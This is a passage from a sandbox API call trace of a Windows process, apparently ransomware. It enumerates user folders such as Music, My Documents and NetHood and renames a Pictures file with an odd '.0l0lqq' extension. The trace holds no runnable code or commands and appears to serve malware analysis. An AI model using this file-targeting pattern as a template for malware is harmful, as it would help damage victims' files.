lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png.0l0lqq", nBufferLength=0x105, lpBuffer=0x26d8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png.0l0lqq", lpFilePart=0x0) returned 0x43 [0254.870] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd04) returned 1 [0254.870] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\yvssvet7s.png"), fInfoLevelId=0x0, lpFileInformation=0x26dd80 | out: lpFileInformation=0x26dd80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bcc27f0, ftCreationTime.dwHighDateTime=0x1d5d87b, ftLastAccessTime.dwLowDateTime=0x9e28daf0, ftLastAccessTime.dwHighDateTime=0x1d5e44d, ftLastWriteTime.dwLowDateTime=0x68de69f0, ftLastWriteTime.dwHighDateTime=0x1d6f0d1, nFileSizeHigh=0x0, nFileSizeLow=0x158f2)) returned 1 [0254.870] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd00) returned 1 [0254.870] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\yvssvet7s.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\vdITubh\\yvssvet7S.png.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vditubh\\yvssvet7s.png.0l0lqq")) returned 1 [0254.874] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0254.874] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood", lpFilePart=0x0) returned 0x25 [0254.875] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\", lpFilePart=0x0) returned 0x26 [0254.875] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*", lpFindFileData=0x26e060 | out: lpFindFileData=0x26e060*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0254.875] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2fc) returned 1 [0254.876] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0254.876] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents", lpFilePart=0x0) returned 0x2a [0254.876] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\", lpFilePart=0x0) returned 0x2b [0254.876] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*", lpFindFileData=0x26e060 | out: lpFindFileData=0x26e060*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0254.876] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2fc) returned 1 [0254.878] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0254.878] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music", lpFilePart=0x0) returned 0x23 [0254.878] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpFilePart=0x0) returned 0x24 [0254.878] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*", lpFindFileData=0x26e060 | out: lpFindFileData=0x26e060*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xda52eda0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xda52eda0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6d28e8 [0254.878] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xda52eda0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xda52eda0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0254.878] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9ed85b0, ftCreationTime.dwHighDateTime=0x1d5db75, ftLastAccessTime.dwLowDateTime=0xf9182c20, ftLastAccessTime.dwHighDateTime=0x1d5e62f, ftLastWriteTime.dwLowDateTime=0xf9182c20, ftLastWriteTime.dwHighDateTime=0x1d5e62f, nFileSizeHigh=0x0, nFileSizeLow=0x94ec, dwReserved0=0x0, dwReserved1=0x0, cFileName="2iawPQcoA3.mp3", cAlternateFileName="2IAWPQ~1.MP3")) returned 1 [0254.878] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf731d200, ftCreationTime.dwHighDateTime=0x1d5e123, ftLastAccessTime.dwLowDateTime=0x79de39c0, ftLastAccessTime.dwHighDateTime=0x1d5dc7c, ftLastWriteTime.dwLowDateTime=0x79de39c0, ftLastWriteTime.dwHighDateTime=0x1d5dc7c, nFileSizeHigh=0x0, nFileSizeLow=0x1166a, dwReserved0=0x0, dwReserved1=0x0, cFileName="3oLXxg5YVBLPn Li.mp3", cAlternateFileName="3OLXXG~1.MP3")) returned 1 [0254.879] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcc88910, ftCreationTime.dwHighDateTime=0x1d5dcc3, ftLastAccessTime.dwLowDateTime=0xf5b94ff0, ftLastAccessTime.dwHighDateTime=0x1d5db8a, ftLastWriteTime.dwLowDateTime=0xf5b94ff0, ftLastWriteTime.dwHighDateTime=0x1d5db8a, nFileSizeHigh=0x0, nFileSizeLow=0x729, dwReserved0=0x0, dwReserved1=0x0, cFileName="4QwfbRhVUa_.m4a", cAlternateFileName="4QWFBR~1.M4A")) returned 1 [0254.879] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x852e5090, ftCreationTime.dwHighDateTime=0x1d5e225, ftLastAccessTime.dwLowDateTime=0x431e6800, ftLastAccessTime.dwHighDateTime=0x1d5e268, ftLastWriteTime.dwLowDateTime=0x431e6800, ftLastWriteTime.dwHighDateTime=0x1d5e268, nFileSizeHigh=0x0, nFileSizeLow=0xc095, dwReserved0=0x0, dwReserved1=0x0, cFileName="bvC6V9ciRknw01.m4a", cAlternateFileName="BVC6V9~1.M4A")) returned 1 [0254.879] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5efe62e0, ftCreationTime.dwHighDateTime=0x1d5d80a, ftLastAccessTime.dwLowDateTime=0xb58ded00, ftLastAccessTime.dwHighDateTime=0x1d5d8e7, ftLastWriteTime.dwLowDateTime=0xb58ded00, ftLastWriteTime.dwHighDateTime=0x1d5d8e7, nFileSizeHigh=0x0, nFileSizeLow=0xd0f5, dwReserved0=0x0, dwReserved1=0x0, cFileName="bzYT.wav", cAlternateFileName="")) returned 1 [0254.879] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x723a6f90, ftCreationTime.dwHighDateTime=0x1d5e61d, ftLastAccessTime.dwLowDateTime=0x52d2780, ftLastAccessTime.dwHighDateTime=0x1d5dfce, ftLastWriteTime.dwLowDateTime=0x52d2780, ftLastWriteTime.dwHighDateTime=0x1d5dfce, nFileSizeHigh=0x0, nFileSizeLow=0xb613, dwReserved0=0x0, dwReserved1=0x0, cFileName="C Hqa.m4a", cAlternateFileName="CHQA~1.M4A")) returned 1 [0254.879] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8c6e6c0, ftCreationTime.dwHighDateTime=0x1d5ded4, ftLastAccessTime.dwLowDateTime=0xbab154b0, ftLastAccessTime.dwHighDateTime=0x1d5dd7a, ftLastWriteTime.dwLowDateTime=0xbab154b0, ftLastWriteTime.dwHighDateTime=0x1d5dd7a, nFileSizeHigh=0x0, nFileSizeLow=0x12f30, dwReserved0=0x0, dwReserved1=0x0, cFileName="ceXLBF8czRszEr5.wav", cAlternateFileName="CEXLBF~1.WAV")) returned 1 [0254.880] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x708ea380, ftCreationTime.dwHighDateTime=0x1d5e59d, ftLastAccessTime.dwLowDateTime=0xb711d830, ftLastAccessTime.dwHighDateTime=0x1d5e0da, ftLastWriteTime.dwLowDateTime=0xb711d830, ftLastWriteTime.dwHighDateTime=0x1d5e0da, nFileSizeHigh=0x0, nFileSizeLow=0x12e98, dwReserved0=0x0, dwReserved1=0x0, cFileName="CTScNZQ V.wav", cAlternateFileName="CTSCNZ~1.WAV")) returned 1 [0254.880] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xddce93b0, ftCreationTime.dwHighDateTime=0x1d5e4ee, ftLastAccessTime.dwLowDateTime=0x848fc5a0, ftLastAccessTime.dwHighDateTime=0x1d5d86c, ftLastWriteTime.dwLowDateTime=0x848fc5a0, ftLastWriteTime.dwHighDateTime=0x1d5d86c, nFileSizeHigh=0x0, nFileSizeLow=0x13237, dwReserved0=0x0, dwReserved1=0x0, cFileName="CwKk0mO1iXxCgRd3.wav", cAlternateFileName="CWKK0M~1.WAV")) returned 1 [0254.880] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce8c4620, ftCreationTime.dwHighDateTime=0x1d5db4a, ftLastAccessTime.dwLowDateTime=0x3f570a40, ftLastAccessTime.dwHighDateTime=0x1d5d969, ftLastWriteTime.dwLowDateTime=0x3f570a40, ftLastWriteTime.dwHighDateTime=0x1d5d969, nFileSizeHigh=0x0, nFileSizeLow=0x3662, dwReserved0=0x0, dwReserved1=0x0, cFileName="D _JoKaSTWq.wav", cAlternateFileName="D_JOKA~1.WAV")) returned 1 [0254.880] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0254.880] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x457d8130, ftCreationTime.dwHighDateTime=0x1d5da66, ftLastAccessTime.dwLowDateTime=0xd23d8ea0, ftLastAccessTime.dwHighDateTime=0x1d5e61c, ftLastWriteTime.dwLowDateTime=0xd23d8ea0, ftLastWriteTime.dwHighDateTime=0x1d5e61c, nFileSizeHigh=0x0, nFileSizeLow=0xdc2f, dwReserved0=0x0, dwReserved1=0x0, cFileName="dMFh PkR1ioJzNm7 N9p.m4a", cAlternateFileName="DMFHPK~1.M4A")) returned 1 [0254.880] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1bf6b50, ftCreationTime.dwHighDateTime=0x1d5e366, ftLastAccessTime.dwLowDateTime=0x48477060, ftLastAccessTime.dwHighDateTime=0x1d5e77c, ftLastWriteTime.dwLowDateTime=0x48477060, ftLastWriteTime.dwHighDateTime=0x1d5e77c, nFileSizeHigh=0x0, nFileSizeLow=0xd402, dwReserved0=0x0, dwReserved1=0x0, cFileName="eNJjT.m4a", cAlternateFileName="")) returned 1 [0254.881] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1b16830, ftCreationTime.dwHighDateTime=0x1d5e58e, ftLastAccessTime.dwLowDateTime=0xccb3b720, ftLastAccessTime.dwHighDateTime=0x1d5e090, ftLastWriteTime.dwLowDateTime=0xccb3b720, ftLastWriteTime.dwHighDateTime=0x1d5e090, nFileSizeHigh=0x0, nFileSizeLow=0x168ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="fl7Fzrs.wav", cAlternateFileName="")) returned 1 [0254.881] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2f20, ftCreationTime.dwHighDateTime=0x1d5dd8d, ftLastAccessTime.dwLowDateTime=0x4df8f5b0, ftLastAccessTime.dwHighDateTime=0x1d5dc55, ftLastWriteTime.dwLowDateTime=0x4df8f5b0, ftLastWriteTime.dwHighDateTime=0x1d5dc55, nFileSizeHigh=0x0, nFileSizeLow=0x9f9d, dwReserved0=0x0, dwReserved1=0x0, cFileName="GnfU6Z-X0Kto7uk.m4a", cAlternateFileName="GNFU6Z~1.M4A")) returned 1 [0254.881] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf2721a0, ftCreationTime.dwHighDateTime=0x1d5dd07, ftLastAccessTime.dwLowDateTime=0x38fbf130, ftLastAccessTime.dwHighDateTime=0x1d5da4d, ftLastWriteTime.dwLowDateTime=0x38fbf130, ftLastWriteTime.dwHighDateTime=0x1d5da4d, nFileSizeHigh=0x0, nFileSizeLow=0xcca4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Hn0jROsDkd.m4a", cAlternateFileName="HN0JRO~1.M4A")) returned 1 [0254.881] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c7468e0, ftCreationTime.dwHighDateTime=0x1d5de13, ftLastAccessTime.dwLowDateTime=0xa15e3d10, ftLastAccessTime.dwHighDateTime=0x1d5de52, ftLastWriteTime.dwLowDateTime=0xa15e3d10, ftLastWriteTime.dwHighDateTime=0x1d5de52, nFileSizeHigh=0x0, nFileSizeLow=0xb6d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="ilzNwr6K0-M3Kz.wav", cAlternateFileName="ILZNWR~1.WAV")) returned 1 [0254.881] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9456300, ftCreationTime.dwHighDateTime=0x1d5e336, ftLastAccessTime.dwLowDateTime=0x24ba8140, ftLastAccessTime.dwHighDateTime=0x1d5d855, ftLastWriteTime.dwLowDateTime=0x24ba8140, ftLastWriteTime.dwHighDateTime=0x1d5d855, nFileSizeHigh=0x0, nFileSizeLow=0xda2b, dwReserved0=0x0, dwReserved1=0x0, cFileName="LH4L.wav", cAlternateFileName="")) returned 1 [0254.881] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x768396b0, ftCreationTime.dwHighDateTime=0x1d5e156, ftLastAccessTime.dwLowDateTime=0xe8c4c210, ftLastAccessTime.dwHighDateTime=0x1d5d7bc, ftLastWriteTime.dwLowDateTime=0xe8c4c210, ftLastWriteTime.dwHighDateTime=0x1d5d7bc, nFileSizeHigh=0x0, nFileSizeLow=0x7c9c, dwReserved0=0x0, dwReserved1=0x0, cFileName="M8kWkNF68au.mp3", cAlternateFileName="M8KWKN~1.MP3")) returned 1 [0254.882] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0dfa9b0, ftCreationTime.dwHighDateTime=0x1d5dc75, ftLastAccessTime.dwLowDateTime=0x5c394380, ftLastAccessTime.dwHighDateTime=0x1d5dcac, ftLastWriteTime.dwLowDateTime=0x5c394380, ftLastWriteTime.dwHighDateTime=0x1d5dcac, nFileSizeHigh=0x0, nFileSizeLow=0xbd75, dwReserved0=0x0, dwReserved1=0x0, cFileName="mqKv.mp3", cAlternateFileName="")) returned 1 [0254.882] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa633d420, ftCreationTime.dwHighDateTime=0x1d5e4ac, ftLastAccessTime.dwLowDateTime=0xf2e99e30, ftLastAccessTime.dwHighDateTime=0x1d5dc87, ftLastWriteTime.dwLowDateTime=0xf2e99e30, ftLastWriteTime.dwHighDateTime=0x1d5dc87, nFileSizeHigh=0x0, nFileSizeLow=0xdd88, dwReserved0=0x0, dwReserved1=0x0, cFileName="MynuZ6aNUi.m4a", cAlternateFileName="MYNUZ6~1.M4A")) returned 1 [0254.882] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3ad5820, ftCreationTime.dwHighDateTime=0x1d5e25a, ftLastAccessTime.dwLowDateTime=0xfee082b0, ftLastAccessTime.dwHighDateTime=0x1d5d874, ftLastWriteTime.dwLowDateTime=0xfee082b0, ftLastWriteTime.dwHighDateTime=0x1d5d874, nFileSizeHigh=0x0, nFileSizeLow=0x8aca, dwReserved0=0x0, dwReserved1=0x0, cFileName="prZy nTBKiTt3Og.mp3", cAlternateFileName="PRZYNT~1.MP3")) returned 1 [0254.882] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ff00c40, ftCreationTime.dwHighDateTime=0x1d5dda4, ftLastAccessTime.dwLowDateTime=0x6e25dc20, ftLastAccessTime.dwHighDateTime=0x1d5e535, ftLastWriteTime.dwLowDateTime=0x6e25dc20, ftLastWriteTime.dwHighDateTime=0x1d5e535, nFileSizeHigh=0x0, nFileSizeLow=0x185cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="rN62yqHdWeu.wav", cAlternateFileName="RN62YQ~1.WAV")) returned 1 [0254.882] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21f18db0, ftCreationTime.dwHighDateTime=0x1d5dfde, ftLastAccessTime.dwLowDateTime=0xf233b870, ftLastAccessTime.dwHighDateTime=0x1d5dad6, ftLastWriteTime.dwLowDateTime=0xf233b870, ftLastWriteTime.dwHighDateTime=0x1d5dad6, nFileSizeHigh=0x0, nFileSizeLow=0xf1f1, dwReserved0=0x0, dwReserved1=0x0, cFileName="s1vqb-bDkSerJ.mp3", cAlternateFileName="S1VQB-~1.MP3")) returned 1 [0254.882] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b7a86b0, ftCreationTime.dwHighDateTime=0x1d5e7b0, ftLastAccessTime.dwLowDateTime=0x9d65e910, ftLastAccessTime.dwHighDateTime=0x1d5debb, ftLastWriteTime.dwLowDateTime=0x9d65e910, ftLastWriteTime.dwHighDateTime=0x1d5debb, nFileSizeHigh=0x0, nFileSizeLow=0x42ff, dwReserved0=0x0, dwReserved1=0x0, cFileName="Spv4lZV4QRobY.mp3", cAlternateFileName="SPV4LZ~1.MP3")) returned 1 [0254.883] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x897dce60, ftCreationTime.dwHighDateTime=0x1d5d87e, ftLastAccessTime.dwLowDateTime=0xb7c19180, ftLastAccessTime.dwHighDateTime=0x1d5e76f, ftLastWriteTime.dwLowDateTime=0xb7c19180, ftLastWriteTime.dwHighDateTime=0x1d5e76f, nFileSizeHigh=0x0, nFileSizeLow=0xfd85, dwReserved0=0x0, dwReserved1=0x0, cFileName="TeqobhMtVNMUhyZ1gwDZ.mp3", cAlternateFileName="TEQOBH~1.MP3")) returned 1 [0254.883] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x675db4d0, ftCreationTime.dwHighDateTime=0x1d5e797, ftLastAccessTime.dwLowDateTime=0xf19d7890, ftLastAccessTime.dwHighDateTime=0x1d5d939, ftLastWriteTime.dwLowDateTime=0xf19d7890, ftLastWriteTime.dwHighDateTime=0x1d5d939, nFileSizeHigh=0x0, nFileSizeLow=0x10179, dwReserved0=0x0, dwReserved1=0x0, cFileName="UNt smOIZH.m4a", cAlternateFileName="UNTSMO~1.M4A")) returned 1 [0254.883] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74f48cc0, ftCreationTime.dwHighDateTime=0x1d5db78, ftLastAccessTime.dwLowDateTime=0x83630aa0, ftLastAccessTime.dwHighDateTime=0x1d5dacb, ftLastWriteTime.dwLowDateTime=0x83630aa0, ftLastWriteTime.dwHighDateTime=0x1d5dacb, nFileSizeHigh=0x0, nFileSizeLow=0xdd82, dwReserved0=0x0, dwReserved1=0x0, cFileName="vlL8C6yl5y.mp3", cAlternateFileName="VLL8C6~1.MP3")) returned 1 [0254.883] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c00c40, ftCreationTime.dwHighDateTime=0x1d5d7d2, ftLastAccessTime.dwLowDateTime=0x988c99c0, ftLastAccessTime.dwHighDateTime=0x1d5e70d, ftLastWriteTime.dwLowDateTime=0x988c99c0, ftLastWriteTime.dwHighDateTime=0x1d5e70d, nFileSizeHigh=0x0, nFileSizeLow=0x51d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wvw9g.m4a", cAlternateFileName="")) returned 1 [0254.883] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cc643b0, ftCreationTime.dwHighDateTime=0x1d5e544, ftLastAccessTime.dwLowDateTime=0x565725a0, ftLastAccessTime.dwHighDateTime=0x1d5e25f, ftLastWriteTime.dwLowDateTime=0x565725a0, ftLastWriteTime.dwHighDateTime=0x1d5e25f, nFileSizeHigh=0x0, nFileSizeLow=0x2415, dwReserved0=0x0, dwReserved1=0x0, cFileName="wXRtldph2BF4ZYHrXn.wav", cAlternateFileName="WXRTLD~1.WAV")) returned 1 [0254.883] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19d19eb0, ftCreationTime.dwHighDateTime=0x1d5de47, ftLastAccessTime.dwLowDateTime=0xaf224320, ftLastAccessTime.dwHighDateTime=0x1d5d910, ftLastWriteTime.dwLowDateTime=0xaf224320, ftLastWriteTime.dwHighDateTime=0x1d5d910, nFileSizeHigh=0x0, nFileSizeLow=0x435a, dwReserved0=0x0, dwReserved1=0x0, cFileName="x4a2o.m4a", cAlternateFileName="")) returned 1 [0254.884] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f27d770, ftCreationTime.dwHighDateTime=0x1d5e712, ftLastAccessTime.dwLowDateTime=0xf956b170, ftLastAccessTime.dwHighDateTime=0x1d5e31e, ftLastWriteTime.dwLowDateTime=0xf956b170, ftLastWriteTime.dwHighDateTime=0x1d5e31e, nFileSizeHigh=0x0, nFileSizeLow=0x18830, dwReserved0=0x0, dwReserved1=0x0, cFileName="xfzL_V5vnmdiqX.m4a", cAlternateFileName="XFZL_V~1.M4A")) returned 1 [0254.884] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc282970, ftCreationTime.dwHighDateTime=0x1d5e692, ftLastAccessTime.dwLowDateTime=0xb0ff4460, ftLastAccessTime.dwHighDateTime=0x1d5df4e, ftLastWriteTime.dwLowDateTime=0xb0ff4460, ftLastWriteTime.dwHighDateTime=0x1d5df4e, nFileSizeHigh=0x0, nFileSizeLow=0xc499, dwReserved0=0x0, dwReserved1=0x0, cFileName="xgpNh-DmsJj0OhJzt.wav", cAlternateFileName="XGPNH-~1.WAV")) returned 1 [0254.884] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39498340, ftCreationTime.dwHighDateTime=0x1d5dfa3, ftLastAccessTime.dwLowDateTime=0xefcd0710, ftLastAccessTime.dwHighDateTime=0x1d5d975, ftLastWriteTime.dwLowDateTime=0xefcd0710, ftLastWriteTime.dwHighDateTime=0x1d5d975, nFileSizeHigh=0x0, nFileSizeLow=0xc36, dwReserved0=0x0, dwReserved1=0x0, cFileName="YfBdjdFR0JACx i.mp3", cAlternateFileName="YFBDJD~1.MP3")) returned 1 [0254.884] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b80ab80, ftCreationTime.dwHighDateTime=0x1d5da1f, ftLastAccessTime.dwLowDateTime=0x5af13f40, ftLastAccessTime.dwHighDateTime=0x1d5e464, ftLastWriteTime.dwLowDateTime=0x5af13f40, ftLastWriteTime.dwHighDateTime=0x1d5e464, nFileSizeHigh=0x0, nFileSizeLow=0x4ffb, dwReserved0=0x0, dwReserved1=0x0, cFileName="YN vq4wn RqkXdR.mp3", cAlternateFileName="YNVQ4W~1.MP3")) returned 1 